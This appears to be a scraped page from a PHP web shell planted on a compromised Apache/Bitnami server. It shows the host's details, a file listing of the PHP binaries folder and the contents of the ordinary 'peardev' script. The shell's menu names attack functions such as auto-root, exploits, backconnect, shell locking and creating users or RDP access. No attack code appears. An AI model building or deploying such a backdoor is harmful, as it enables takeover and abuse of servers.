Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
php /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
composer
2.92
MB
-rwxr-xr-x
composer.phar
2.92
MB
-rwxr-xr-x
pear
847
B
-rwxr-xr-x
peardev
868
B
-rwxr-xr-x
pecl
781
B
-rwxr-xr-x
phar
14.89
KB
-rwxr-xr-x
phar.phar
14.89
KB
-rwxr-xr-x
php
20.04
MB
-rwxr-xr-x
php-cgi
20.04
MB
-rwxr-xr-x
php-config
3.63
KB
-rwxr-xr-x
phpdbg
20.04
MB
-rwxr-xr-x
phpize
4.45
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : peardev
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/opt/bitnami/php/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/opt/bitnami/php/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/opt/bitnami/php/lib/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/opt/bitnami/php/lib/php" INCARG="-d include_path=/opt/bitnami/php/lib/php" fi fi exec $PHP -d date.timezone=UTC -d memory_limit="-1" -C -q $INCARG -d output_buffering=1 -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d variables_order=EGPCS -d auto_append_file="" $INCDIR/pearcmd.php "$@"
Close